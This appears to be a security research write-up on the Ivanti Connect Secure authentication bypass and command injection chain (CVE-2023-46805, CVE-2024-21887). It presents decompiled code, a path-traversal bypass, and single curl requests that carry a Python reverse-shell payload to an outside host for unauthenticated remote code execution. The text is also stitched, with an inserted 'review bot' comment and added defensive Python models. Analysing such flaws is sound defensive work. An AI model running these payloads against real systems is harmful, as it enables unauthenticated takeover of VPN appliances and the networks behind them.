@@ -94,10 +94,10 @@ "POST, 403, /api/v1/dsintegration" "PUT, 403, /api/v1/dsintegration" "DELETE, 403, /api/v1/dsintegration" -"GET, 302, /api/v1/enduser" -"POST, 302, /api/v1/enduser" -"PUT, 302, /api/v1/enduser" -"DELETE, 302, /api/v1/enduser" +"GET, 403, /api/v1/enduser" +"POST, 403, /api/v1/enduser" +"PUT, 403, /api/v1/enduser" +"DELETE, 403, /api/v1/enduser" "GET, 302, /api/v1/enduser/autolaunch-client-apps" "POST, 302, /api/v1/enduser/autolaunch-client-apps" "PUT, 302, /api/v1/enduser/autolaunch-client-apps" 
@@ -186,22 +186,22 @@ "POST, 302, /api/v1/enduser/fb/win-zip-download" "PUT, 302, /api/v1/enduser/fb/win-zip-download" "DELETE, 302, /api/v1/enduser/fb/win-zip-download" -"GET, 302, /api/v1/enduser/full" -"POST, 302, /api/v1/enduser/full" -"PUT, 302, /api/v1/enduser/full" -"DELETE, 302, /api/v1/enduser/full" +"GET, 403, /api/v1/enduser/full" +"POST, 403, /api/v1/enduser/full" +"PUT, 403, /api/v1/enduser/full" +"DELETE, 403, /api/v1/enduser/full" "GET, 302, /api/v1/enduser/heartbeat" "POST, 302, /api/v1/enduser/heartbeat" "PUT, 302, /api/v1/enduser/heartbeat" "DELETE, 302, /api/v1/enduser/heartbeat" -"GET, 302, /api/v1/enduser/host-resolve-status" -"POST, 302, /api/v1/enduser/host-resolve-status" -"PUT, 302, /api/v1/enduser/host-resolve-status" -"DELETE, 302, /api/v1/enduser/host-resolve-status" -"GET, 302, /api/v1/enduser/html5-remote-desktop-launcher" -"POST, 302, /api/v1/enduser/html5-remote-desktop-launcher" -"PUT, 302, /api/v1/enduser/html5-remote-desktop-launcher" -"DELETE, 302, /api/v1/enduser/html5-remote-desktop-launcher" +"GET, 403, /api/v1/enduser/host-resolve-status" +"POST, 403, /api/v1/enduser/host-resolve-status" +"PUT, 403, /api/v1/enduser/host-resolve-status" +"DELETE, 403, /api/v1/enduser/host-resolve-status" +"GET, 403, /api/v1/enduser/html5-remote-desktop-launcher" +"POST, 403, /api/v1/enduser/html5-remote-desktop-launcher" +"PUT, 403, /api/v1/enduser/html5-remote-desktop-launcher" +"DELETE, 403, /api/v1/enduser/html5-remote-desktop-launcher" "GET, 302, /api/v1/enduser/jsam/apps-reorder" "POST, 302, /api/v1/enduser/jsam/apps-reorder" "PUT, 302, /api/v1/enduser/jsam/apps-reorder" 
@@ -418,10 +418,10 @@ "POST, 403, /api/v1/logs/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "PUT, 403, /api/v1/logs/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "DELETE, 403, /api/v1/logs/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"GET, 302, /api/v1/metrics" -"POST, 302, /api/v1/metrics" -"PUT, 302, /api/v1/metrics" -"DELETE, 302, /api/v1/metrics" +"GET, 403, /api/v1/metrics" +"POST, 403, /api/v1/metrics" +"PUT, 403, /api/v1/metrics" +"DELETE, 403, /api/v1/metrics" "GET, 403, /api/v1/network" "POST, 403, /api/v1/network" "PUT, 403, /api/v1/network" @@ -486,10 +486,10 @@ "POST, 403, /api/v1/realm_auth" "PUT, 403, /api/v1/realm_auth" "DELETE, 403, /api/v1/realm_auth" -"GET, 302, /api/v1/saml-" -"POST, 302, /api/v1/saml-" -"PUT, 302, /api/v1/saml-" -"DELETE, 302, /api/v1/saml-" +"GET, 403, /api/v1/saml-" +"POST, 403, /api/v1/saml-" +"PUT, 403, /api/v1/saml-" +"DELETE, 403, /api/v1/saml-" "GET, 403, /api/v1/saml-config/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/download-metadata" "POST, 403, /api/v1/saml-config/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/download-metadata" "PUT, 403, /api/v1/saml-config/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/download-metadata" @@ -510,10 +510,10 @@ "POST, 403, /api/v1/saml-config/sp" "PUT, 403, /api/v1/saml-config/sp" "DELETE, 403, /api/v1/saml-config/sp" -"GET, 302, /api/v1/sdpotp" -"POST, 302, /api/v1/sdpotp" -"PUT, 302, /api/v1/sdpotp" -"DELETE, 302, /api/v1/sdpotp" +"GET, 403, /api/v1/sdpotp" +"POST, 403, /api/v1/sdpotp" +"PUT, 403, /api/v1/sdpotp" +"DELETE, 403, /api/v1/sdpotp" "GET, 403, /api/v1/snmp/download-mib" "POST, 403, /api/v1/snmp/download-mib" "PUT, 403, /api/v1/snmp/download-mib" 
@@ -682,10 +682,10 @@ "POST, 403, /api/v1/system/failed-login-count" "PUT, 403, /api/v1/system/failed-login-count" "DELETE, 403, /api/v1/system/failed-login-count" -"GET, 200, /api/v1/system/healthcheck" -"POST, 200, /api/v1/system/healthcheck" -"PUT, 200, /api/v1/system/healthcheck" -"DELETE, 200, /api/v1/system/healthcheck" +"GET, 403, /api/v1/system/healthcheck" +"POST, 403, /api/v1/system/healthcheck" +"PUT, 403, /api/v1/system/healthcheck" +"DELETE, 403, /api/v1/system/healthcheck" "GET, 403, /api/v1/system/ifmap/imported-sessions" "POST, 403, /api/v1/system/ifmap/imported-sessions" "PUT, 403, /api/v1/system/ifmap/imported-sessions" 
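Review bot: /api/v1/system/healthcheck is the only path in this diff whose pre-mitigation code was 200 for all four methods, so unlike the 302 to 403 entries it was being served to an unauthenticated client rather than redirected; the text that follows moves straight to /api/v1/totp/user-backup-code, and a sentence on what this endpoint returned before mitigation and why it was set aside would make the triage of the 15 changed paths easier to follow.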
@@ -830,10 +830,10 @@ "POST, 403, /api/v1/totp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/" "PUT, 403, /api/v1/totp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/" "DELETE, 403, /api/v1/totp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/" -"GET, 405, /api/v1/totp/user-backup-code" -"POST, 500, /api/v1/totp/user-backup-code" -"PUT, 405, /api/v1/totp/user-backup-code" -"DELETE, 405, /api/v1/totp/user-backup-code" +"GET, 403, /api/v1/totp/user-backup-code" +"POST, 403, /api/v1/totp/user-backup-code" +"PUT, 403, /api/v1/totp/user-backup-code" +"DELETE, 403, /api/v1/totp/user-backup-code" "GET, 403, /api/v1/ueba/" "POST, 403, /api/v1/ueba/" "PUT, 403, /api/v1/ueba/"

Of the 376 URI paths pulled from the web and REST servers, 15 have a different HTTP response after the mitigation has been applied, and all of them are located in the REST API. We will therefore focus our attention on the Python-based REST API service. After investigating several of the endpoints that returned a different HTTP response, we focus on the endpoint /api/v1/totp/user-backup-code.

The native code web server has a function doAuthCheck that tests a URI to decide whether authentication needs to be performed before the request is served. We can see that several paths do not need authentication. Of note is the use of strncmp, which only compares the first N characters of the path. This means that a path that begins with /api/v1/totp/user-backup-code will not have authentication enforced, and the path can also have additional characters appended to it, all of which will be passed to the Python backend REST service when the request is proxied.

// web!doAuthCheck
bool __cdecl doAuthCheck(DSLog::Debug *a1, unsigned int *a2)
{
  // ...snip...
  uri_path = a1->uri_path;
  if ( !strncmp((const char *)uri_path, "/api/v1/ueba/", 0xDu)
    || !strncmp((const char *)uri_path, "/api/v1/integration/", 0x14u)
    || !strncmp((const char *)uri_path, "/api/v1/dsintegration", 0x15u)
    || !strncmp((const char *)uri_path, "/api/v1/pps/action/", 0x13u)
    || !strncmp((const char *)uri_path, "/api/my-session", 0xFu)
    || !strncmp((const char *)uri_path, "/api/v1/totp/user-backup-code", 0x1Du) // <---
    || !strncmp((const char *)uri_path, "/api/v1/esapdata", 0x10u)
    || !strncmp((const char *)uri_path, "/api/v1/sessions", 0x10u)
    || !strncmp((const char *)uri_path, "/api/v1/tasks", 0xDu)
    || !strncmp((const char *)uri_path, "/api/v1/gateways", 0x10u)
    || !strncmp((const char *)uri_path, "/_/api/aaa", 0xAu)
    || !strncmp((const char *)uri_path, "/api/v1/oidc", 0xCu) )
  {
    return 1; // <---
  }
  // ...go on and enforce authentication...

Additional authentication checks appear to occur in the function PyRestHandler::handleRequest, but not for the path /api/v1/totp/user-backup-code.

Knowing we can reach the internal Python REST service by requesting the unauthenticated /api/v1/totp/user-backup-code endpoint, and knowing we can also supply additional characters in the path, all of which will be passed to the Python Flask application, we can experiment with accessing other resources in the Flask application by using double-dot (..) path segments. It transpires that we can access any resource in the Flask application using this technique, bypassing all authentication checks in the native web server.

To test the auth bypass we first try to access the authenticated REST API endpoint /api/v1/system/system-information while providing neither an authentication cookie nor a valid API key. As expected, this request fails with an HTTP 403 Forbidden error.
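Before the requests that demonstrate this, here is an added Python model of the doAuthCheck weakness (not code from the appliance or from Rapid7): it reproduces the strncmp prefix test as startswith() over the exemption list above, shows how deciding on the canonical path instead closes the hole, and gives a classifier a defender can run over logged request paths. The hardened check and the sample paths are assumptions for illustration, not Ivanti's patch.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Prefixes that doAuthCheck exempts from authentication, taken from the
# decompiled strncmp chain above. strncmp(path, prefix, len(prefix)) is
# exactly a startswith() test, so that is how it is modelled here.
AUTH_EXEMPT_PREFIXES = (
    "/api/v1/ueba/",
    "/api/v1/integration/",
    "/api/v1/dsintegration",
    "/api/v1/pps/action/",
    "/api/my-session",
    "/api/v1/totp/user-backup-code",
    "/api/v1/esapdata",
    "/api/v1/sessions",
    "/api/v1/tasks",
    "/api/v1/gateways",
    "/_/api/aaa",
    "/api/v1/oidc",
)


def prefix_exempt(path: str) -> bool:
    """The vulnerable check: a prefix match on the raw request path and nothing else."""
    return any(path.startswith(prefix) for prefix in AUTH_EXEMPT_PREFIXES)


def canonical_path(raw_path: str) -> str:
    """Percent-decode the path and collapse '.' and '..' segments, which is what
    the backend router effectively does before choosing a resource."""
    path = unquote(urlsplit(raw_path).path)
    canon = posixpath.normpath(path)
    # normpath strips a trailing slash; keep it so '/api/v1/ueba/' still matches
    if path.endswith("/") and not canon.endswith("/"):
        canon += "/"
    return canon


def hardened_exempt(raw_path: str) -> bool:
    """Assumed fix (not Ivanti's actual patch): decide on the canonical path only,
    and refuse the exemption whenever canonicalisation changed the path at all."""
    path = unquote(urlsplit(raw_path).path)
    canon = canonical_path(raw_path)
    if canon != path:
        return False
    return prefix_exempt(canon)


def classify(raw_path: str) -> str:
    """Detection view for proxy or access logs: a request that is exempt by raw
    prefix but whose canonical form is not exempt is a bypass attempt."""
    raw_exempt = prefix_exempt(raw_path)
    if raw_exempt and not prefix_exempt(canonical_path(raw_path)):
        return "bypass-attempt"
    return "exempt" if raw_exempt else "auth-required"


# Constructed sample request paths (not from the page): a legitimate exempt
# request, an ordinary authenticated request, and the traversal shape used in
# the curl examples on this page.
SAMPLE_PATHS = [
    "/api/v1/totp/user-backup-code",
    "/api/v1/system/system-information",
    "/api/v1/totp/user-backup-code/../../system/system-information",
]


def bypass_attempts(paths) -> list:
    """Return the subset of paths that classify() flags."""
    return [p for p in paths if classify(p) == "bypass-attempt"]


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{classify(p):15} raw={prefix_exempt(p)} hardened={hardened_exempt(p)} {p}")
```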
$ curl -ik https://192.168.86.111/api/v1/system/system-information
HTTP/1.1 403 Forbidden
Transfer-Encoding: chunked
X-XSS-Protection: 1
Strict-Transport-Security: max-age=31536000

Next we access our target endpoint via the auth bypass technique, using a URI path of /api/v1/totp/user-backup-code/../../system/system-information. We can see that this request succeeds, returning the system information.

$ curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../system/system-information
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 297

{"software-inventory":{"software":{"build":"1647","name":"IVE-OS","type":"operating-system","version":"22.3R1"}},"system-information":{"hardware-model":"ISA-V","host-name":"localhost2","machine-id":"*****************","os-name":"ive-sa","os-version":"22.3R1","serial-number":"*****************"}}

We can now access any endpoint in the Python REST backend, and can begin to search for a suitable authenticated command injection vulnerability to chain with this auth bypass in order to achieve unauthenticated RCE.

INJECTING COMMANDS

As we are hunting for a command injection vulnerability in a Python service, a good candidate to search for is the usage of the Popen and system function calls. These functions create a child process with caller-supplied arguments and are often the cause of command injection vulnerabilities in Python applications. The REST service implements the logic for its endpoints in the restservice-0.1-py3.6.egg file, so we can extract this and grep it for candidates to go bug hunting in.
$ unzip ics_disk1/root/home/venv3/lib/python3.6/site-packages/restservice-0.1-py3.6.egg -d restservice-0.1
$ cd restservice-0.1/
restservice-0.1$ grep -r Popen --include=*.py
restservice/api/resources/config.py:        proc = subprocess.Popen(
restservice/api/resources/config.py:        proc = subprocess.Popen(args, stdout=subprocess.PIPE)
restservice/api/resources/config.py:        proc = subprocess.Popen(popen_args, stdout=subprocess.PIPE)
restservice/api/resources/localbackupsysconfiganduseracc.py:        proc = subprocess.Popen(
restservice/api/resources/localbackupsysconfiganduseracc.py:        proc = subprocess.Popen(
restservice/api/resources/localbackupsysconfiganduseracc.py:        proc = subprocess.Popen(
restservice/api/resources/controller.py:        proc = subprocess.Popen(
restservice/api/resources/controller.py:        proc = subprocess.Popen(
restservice/api/resources/exportxml.py:        proc = subprocess.Popen(popen_args, stdout=subprocess.PIPE)
restservice/api/resources/webprofile.py:        proc = subprocess.Popen(
restservice/api/resources/webprofile.py:        cabbase_proc = subprocess.Popen(
restservice/api/resources/awsazuretestconnection.py:        proc = subprocess.Popen(
restservice/api/resources/html5.py:        # proc = subprocess.Popen(smbClientCmd, shell=True, stdout=subprocess.PIPE)
restservice/api/resources/nsaregistration.py:        proc = subprocess.Popen(
restservice/api/resources/exportuniversalxml.py:        proc = subprocess.Popen(popen_args, stdout=subprocess.PIPE)
restservice/api/resources/license.py:        proc = subprocess.Popen(
restservice/api/resources/license.py:        proc = subprocess.Popen(
restservice/api/resources/license.py:        proc = subprocess.Popen(
restservice/api/resources/license.py:        proc = subprocess.Popen(
restservice/api/resources/license.py:        proc = subprocess.Popen(

Reviewing the 20 results that come back, we identify several usages of Popen in which the command string passed to Popen is built from a sequence of + operators that concatenate the pieces together.
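The two Popen styles side by side, as an added Python example rather than code from the restservice package: the shell=True concatenated-string form that the grep hits above use (and that both injections on this page depend on), and the argument-list form. echo stands in for the perl wrapper so the effect of an untrusted value is visible without touching an appliance; the node-name allow-list is an assumption.

```python
import re
import subprocess

# Stand-in for the appliance's perl wrapper (constructed for this example):
# 'echo' prints the words it receives, so its output shows exactly how the
# command line was split. license.py on this page really runs
#   $DSINSTALL/perl5/bin/perl $DSINSTALL/perl/getLicenseCapacity.pl getLicenseKeys <node_name>
TOOL = "echo"


def run_concatenated(node_name: str) -> list:
    """Vulnerable pattern from the grep results: one string, shell=True, the
    caller-supplied value concatenated in. Returns the lines the shell produced."""
    cmd = TOOL + " getLicenseKeys " + node_name
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
    out, _ = proc.communicate()
    return out.decode().splitlines()


def run_argv(node_name: str) -> list:
    """Hardened form: argument list and no shell. node_name reaches the program
    as a single argv element whatever characters it contains."""
    proc = subprocess.Popen([TOOL, "getLicenseKeys", node_name], stdout=subprocess.PIPE)
    out, _ = proc.communicate()
    return out.decode().splitlines()


# Assumed allow-list for a node name; the real format is not documented on the page.
NODE_NAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def node_name_allowed(node_name: str) -> bool:
    """True only for values matching the allow-list (no spaces, no metacharacters)."""
    return NODE_NAME_RE.fullmatch(node_name) is not None


def run_validated(node_name: str) -> list:
    """Defence in depth: reject anything outside the allow-list before Popen,
    then still use the argv form."""
    if not node_name_allowed(node_name):
        raise ValueError("invalid node name")
    return run_argv(node_name)


if __name__ == "__main__":
    # Constructed input: a harmless second command so the shell split is visible.
    tainted = "node1; echo SECOND-COMMAND"
    print("shell=True :", run_concatenated(tainted))  # two lines: the value was split
    print("argv list  :", run_argv(tainted))          # one line: the value stayed whole
```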
Popen can alternatively take a list of arguments rather than a single string, and some of the results from our grepping above use this form, which is generally safe from command injection (but not necessarily from argument injection).

We identified two authenticated command injection vulnerabilities, both of which are likely candidates for CVE-2024-21887. We have verified that both vulnerabilities are prevented from working when the vendor-supplied mitigation is applied.

FIRST COMMAND INJECTION

Of the instances of Popen that concatenate their command string together, we identify the get method in the file restservice/api/resources/license.py, which handles requests for the endpoint /api/v1/license/keys-status.

class License(Resource):
    """
    Handles requests that are coming for licensing APIs
    For now the only API is license/auth-code
    """

    # ...snip...

    def get(self, url_suffix=None, node_name=None):
        if request.path.startswith("/api/v1/license/keys-status"):
            try:
                dsinstall = os.environ.get("DSINSTALL")
                if node_name == None:
                    node_name = ""
                proc = subprocess.Popen(
                    dsinstall
                    + "/perl5/bin/perl"
                    + " "
                    + dsinstall
                    + "/perl/getLicenseCapacity.pl"
                    + " getLicenseKeys "
                    + node_name,  # <---
                    shell=True,
                    stdout=subprocess.PIPE,
                )

If an attacker can supply an arbitrary node_name value, then command injection can be achieved. As this is a Flask application, we look at how these endpoints are mapped by inspecting restservice/api/__init__.py.

import logging

from flask import Flask
from flask_restful import Api

from logger.logger import Logger
from logger.proxyhandler import ProxyHandler

app = Flask(__name__)
app.logger.setLevel(logging.DEBUG)
app.logger.addHandler(ProxyHandler("CONFIG:API:APP"))
ive_logger = Logger()
api = Api(app)

# ...snip...

api.add_resource(
    License,
    # ...snip...
    "/api/v1/license/keys-status",
    "/api/v1/license/keys-status/<path:node_name>",  # <---
    # ...snip...
    resource_class_kwargs={"ive_logger": ive_logger},
)

# ...snip...
We can see that the parameter node_name is automatically mapped from the trailing path segment of the request's URI path, /api/v1/license/keys-status/<path:node_name>. We can therefore achieve an unauthenticated command injection by performing a GET request to the URI path /api/v1/totp/user-backup-code/../../license/keys-status/;CMD; (where CMD is an arbitrary Linux OS command). The semicolon character lets us specify an arbitrary command for the shell spawned by Popen to execute. As we are passing the arbitrary command as part of the URI in the GET request, we must URL-encode our payload. For example, a Python-based reverse shell payload:

;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.86.43",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';

will be encoded as follows:

%3b%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%38%36%2e%34%33%22%2c%34%34%34%34%29%29%3b%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%2c%73%74%64%69%6e%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%6f%75%74%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%65%72%72%3d%73%2e%66%69%6c%65%6e%6f%28%29%29%27%3B

and we can exploit the appliance with a single curl request and achieve unauthenticated OS command execution:

$ curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../license/keys-status/%3b%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%38%36%2e%34%33%22%2c%34%34%34%34%29%29%3b%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%2c%73%74%64%69%6e%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%6f%75%74%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%65%72%72%3d%73%2e%66%69%6c%65%6e%6f%28%29%29%27%3B

We have verified that the vendor-supplied mitigation will prevent this exploit from working.

SECOND COMMAND INJECTION

As we found several occurrences of Popen, we also identified a second authenticated command injection vulnerability. The file restservice/api/resources/awsazuretestconnection.py has the following function to handle POST requests to the endpoint /api/v1/system/maintenance/archiving/cloud-server-test-connection.

class AwsAzureTestConnection(Resource):
    # ...snip...
    def post(self):
        """
        Available API
        /api/v1/system/maintenance/archiving/cloud-server-test-connection
        POST Body:
        {
            "type":"AZURE",
            "txtS3Server":"<AWS-S3-bucket-name>",
            "txtS3Directory":"<AWS-S3-bucket-location>",
            "txtS3User":"<AWS-access-key>",
            "txtS3Password":"<AWS-secret-key>",
            "txtazureServer":"<Azure-server-name>",
            "txtazureUser":"<Azure-user-name>",
            "txtazurePassword":"<Azure-password>"
        }
        /api/v1/system/maintenance/archiving/cloud-server-test-connection
        POST Body:
        {
            "type": "GCP",
            "txtGCPProject":"ProjName",
            "txtGCPSecret":"/homes/preritc/JsonKey",
            "txtGCPPath":"Path/DirPath",
            "txtGCPBucket":"bucket-mumbai"
        }
        """
        server_information = []
        method = ""
        if request.path.endswith("cloud-server-test-connection"):
            if request.json is None:
                return make_response(
                    jsonify(self.get_error_response("Accepts only JSON")), 400
                )
            else:
                if "type" not in request.json:
                    return make_response(
                        jsonify(
                            self.get_error_response(
                                "Please specify the Type as AWS or AZURE or GCP"
                            )
                        ),
                        400,
                    )
                else:
                    tmpKeyFile = None
                    method = request.json.get("type", "")  # <---
                    if method == "GCP":
                        secretKeyJson = request.json.get("txtGCPSecret")
                        if not secretKeyJson:
                            # Secret Key not provided in request body, look for existing config in cache
                            ci = DSCacheItem("archive", "info")
                            table = DSUtilTable()
                            ci.getUtilTable(table)
                            secretKeyJson = table.getValue("password")
                            if not secretKeyJson:
                                return make_response(
                                    jsonify(
                                        self.get_error_response(
                                            "No existing Secret Key configuration found, please upload an appropriate JSON file and try again."
                                        )
                                    ),
                                    400,
                                )
                        try:
                            # Attribute is expected to have file content in base64 encoded format
                            secretKeyJson = base64.b64decode(secretKeyJson)
                            # File with decoded JSON required by CloudStorageClient tool to test the connection
                            tmpKeyFile = tempfile.NamedTemporaryFile(suffix=".json")
                            tmpKeyFile.write(secretKeyJson)
                            tmpKeyFile.seek(0)
                            request.json["txtGCPSecret"] = tmpKeyFile.name
                        except (base64.binascii.Error, OSError) as err:
                            return make_response(
                                jsonify(
                                    self.get_error_response(
                                        "Could not store secret key JSON in temporary file. Error: {0}".format(
                                            err
                                        )
                                    )
                                ),
                                400,
                            )
                        for i in gcpserverMajorKeys:
                            if (
                                i in list(request.json.keys())
                                and len(request.json.get(i, "")) > 0
                            ):
                                server_information.append(request.json.get(i, ""))
                            else:
                                server_information.append("None")
                    if method == "AWS":
                        for i in awsserverMajorKeys:
                            if (
                                i in list(request.json.keys())
                                and len(request.json.get(i, "")) > 0
                            ):
                                server_information.append(request.json.get(i, ""))
                            else:
                                server_information.append("None")
                    if method == "AZURE":
                        for i in azureserverMajorKeys:
                            if (
                                i in list(request.json.keys())
                                and len(request.json.get(i, "")) > 0
                            ):
                                server_information.append(request.json.get(i, ""))
                            else:
                                server_information.append("None")
                    for i in serverOptionKeys:
                        if (
                            i in list(request.json.keys())
                            and request.json.get(i, "") != ""
                        ):
                            server_information.append(request.json.get(i, ""))
                        else:
                            server_information.append("filter_default")
                    for i in serverCheckKeys:
                        if i in list(request.json.keys()):
                            if request.json.get(i, "") == "ON":
                                server_information.append(1)
                            else:
                                server_information.append(0)
                    for i in serverUploadLogKeys:
                        if i in list(request.json.keys()):
                            if request.json.get(i, "") == "ON":
                                server_information.append(1)
                            else:
                                server_information.append(0)
                    for i in serverSensorsLogFilterKeys:
                        if (
                            i in list(request.json.keys())
                            and request.json.get(i, "") != ""
                        ):
                            server_information.append(request.json.get(i, ""))
                        else:
                            server_information.append("filter_default")
                    for i in serverSensorsLogKeys:
                        if i in list(request.json.keys()):
                            if request.json.get(i, "") == "ON":
                                server_information.append(1)
                            else:
                                server_information.append(0)
                    for i in serverXmlKeys:
                        if i in list(request.json.keys()):
                            if request.json.get(i, "") == "ON":
                                server_information.append(1)
                            else:
                                server_information.append(0)
                    for i in serverIVSKeys:
                        if i in list(request.json.keys()):
                            if request.json.get(i, "") == "ON":
                                server_information.append(1)
                            else:
                                server_information.append(0)
                    for i in serverIVSPasswdKeys:
                        if (
                            i in list(request.json.keys())
                            and len(request.json.get(i, "")) > 0
                        ):
                            server_information.append(request.json.get(i, ""))
                        else:
                            server_information.append("None")
                    for i in serverURSdbKeys:
                        if (
                            i in list(request.json.keys())
                            and len(request.json.get(i, "")) > 0
                        ):
                            if len(request.json.get(i, "")) > 0:
                                server_information.append(1)
                            else:
                                server_information.append(0)
                    for i in serverURSPasswordKeys:
                        if (
                            i in list(request.json.keys())
                            and len(request.json.get(i, "")) > 0
                        ):
                            if len(request.json.get(i, "")) > 0:
                                server_information.append(1)
                            else:
                                server_information.append(0)
                    for i in serverDebugLogKeys:
                        if i in list(request.json.keys()):
                            if request.json.get(i, "") == "ON":
                                server_information.append(1)
                            else:
                                server_information.append(0)
                    for i in serverSnapShotKeys:
                        if i in list(request.json.keys()):
                            if request.json.get(i, "") == "ON":
                                server_information.append(1)
                            else:
                                server_information.append(0)
                    if (request.json.get("chkExcludeLargeData", "") == "") or (
                        "chkExcludeLargeData" not in request.json
                    ):
                        server_information.append(0)
                    if request.json.get("chkExcludeLargeData", "") == "ON":
                        server_information.append(1)
                    if method == "GCP":
                        if (
                            "txtGCPPath" in list(request.json.keys())
                            and request.json.get("txtS3Path", "") != ""
                        ):
                            server_information.append(
                                request.json.get("txtGCPPath", "")
                            )
                        else:
                            server_information.append("")
                    if method == "AWS":
                        if (
                            "txtS3Path" in list(request.json.keys())
                            and request.json.get("txtS3Path", "") != ""
                        ):
                            server_information.append(request.json.get("txtS3Path", ""))
                        else:
                            server_information.append("")
                    if method == "AZURE":
                        if (
                            "txtAzurePath" in list(request.json.keys())
                            and request.json.get("txtAzurePath", "") != ""
                        ):
                            server_information.append(
                                request.json.get("txtAzurePath", "")
                            )
                        else:
                            server_information.append("")

We can see above that the variable called method is set from the request's JSON content, via a key called type. If an attacker supplies a semicolon-delimited OS command in this value, it will be executed via Popen.

dsinstall = os.environ.get("DSINSTALL")
proc = subprocess.Popen(
    dsinstall
    + "/perl5/bin/perl"
    + " "
    + dsinstall
    + "/perl/AwsAzureTestConnection.pl "
    + method  # <---
    + " "
    + " ".join([str(x) for x in list(server_information)]),
    shell=True,
    stdout=subprocess.PIPE,
)

Using the same Python reverse shell payload from the first command injection, we can construct a JSON structure to trigger the vulnerability (as the payload is in JSON, it does not need to be URL-encoded).

{
    "type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.86.35\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';",
    "txtGCPProject": "a",
    "txtGCPSecret": "a",
    "txtGCPPath": "a",
    "txtGCPBucket": "a"
}

While the endpoint /api/v1/system/maintenance/archiving/cloud-server-test-connection is authenticated, we can chain the auth bypass vulnerability and construct the unauthenticated URI path /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection to reach this endpoint and exploit the vulnerability.
A single curl request to achieve unauthenticated OS command execution is then performed as follows:

curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"192.168.86.43\\\",4444));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'

We have verified that the vendor-supplied mitigation will prevent this exploit from working.

REMEDIATION

Ivanti disclosed both CVE-2023-46805 and CVE-2024-21887 on January 10, 2024, but this was done prior to the release of official patches, which are scheduled for a staggered release beginning on January 22, 2024. Ivanti has provided an interim solution in the form of an XML mitigation file that blocks access to certain URLs in order to prevent the exploit chain from working. It is highly recommended to apply this interim workaround on an urgent basis. A knowledge base article is available for further details on Ivanti's interim workaround.

REFERENCES

* Vendor Advisory
* Rapid7 Blog
* watchTowr Blog